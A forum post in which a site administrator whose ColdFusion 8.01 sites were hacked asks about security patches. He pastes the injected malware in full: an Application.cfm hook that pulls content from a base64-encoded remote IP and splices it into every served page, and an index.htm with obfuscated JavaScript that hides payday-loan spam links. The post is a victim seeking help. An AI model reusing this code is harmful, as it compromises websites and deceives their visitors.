CF8.01 hacked. Need info on patches

Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.

Here's the hack:

1. Application.cfm

<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">

<cfset mmy = cfhttp.FileContent><cfoutput>

#mmy#

</cfoutput>

</cfsavecontent>

<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">

<cfset cfs = cfhttp.FileContent>

<cfif (FindNoCase("</div>",paga) GT 0)>

<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>

<cfelseif (FindNoCase("</table>",paga) GT 0)>

<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>

<cfelseif (FindNoCase("</a>",paga) GT 0)>

<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>

<cfelse>

<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>

</cfif>

<cfoutput>

#paga#

</cfoutput>

<cfabort>

</cfif>

<cffunction name="hSWaawe"> 

<cfargument name="HxzcGlk">

<cfset Ypg = ToString(ToBinary(HxzcGlk))>

<cfreturn Ypg>

</cffunction>

1. Index.htm

<html>

  <head>

    <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">

  </head>

  <body>

    <br>

    <br>

    <br>

    <br>

    <center>

      <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','99779188 90','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();

</script>

<p class="zdroq">

Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>

    </center>

  </body>

</html>

Thanks in advance.

--Jeremy